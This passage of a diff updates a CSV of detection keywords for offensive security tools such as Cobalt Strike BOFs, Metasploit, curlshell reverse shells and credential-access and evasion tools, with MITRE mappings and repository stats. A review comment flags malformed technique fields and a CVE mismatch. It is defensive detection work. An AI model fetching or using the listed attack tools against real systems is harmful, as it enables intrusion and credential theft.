APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*/cube0x0/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1259","318","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" "*/cuddlephish.git*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" 
@@ -3210,20 +3216,20 @@ "*/curl.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x64.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x86.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" -"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - 
TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*/custom_payload_generator/*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" -"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/CVE*/chocobo_root*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/CVE-*_EXPLOIT_0DAY/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" -"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/CVE-2009-2698/katon.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/CVE-2022-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*/CVE-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/CVE-2022-0847/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/CVE-2022-0847-dirty-pipe-checker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" 
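Review bot: The technique list on the re-added metasploit rows (`*/customPayload/*`, `*/CVE-*.bin`, `*/CVE-*.jar`, `*/CVE-*x64.exe`, `*/CVE-*x86.exe`) is malformed: it contains `T1204 -T1210`, while every other separator in metadata_tool_techniques is ` - `. A consumer that splits the field on ` - ` would get the single token `T1204 -T1210` and lose both mappings, so the field should read `T1204 - T1210`. The untouched `*/CVE-*_EXPLOIT_0DAY/*` row has the same problem (`T1212 -T1003.001`), and its description names CVE-2023-23399 while its link points to the CVE-2023-23397 repository. Separately, `*/CVE-*.bin` and `*/CVE-*.jar` are enabled for proxy detection at severity 10 with `N/A` in metadata_comment. Wildcards this broad may also match benign advisory or patch artefacts, so a false-positive note in metadata_comment would help analysts triage hits.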
@@ -3244,37 +3250,39 @@ "*/D1rkInject.git*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/d4em0n/exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/DAMP.git*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" 
"*/DanMcInerney/ridenum*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/daphne.git*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/daphne-x64*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/darkarmour.git*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" 
"*/darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/darkhotel.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*/darkweb2017-top100.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/DarkWidow.git*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial 
Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
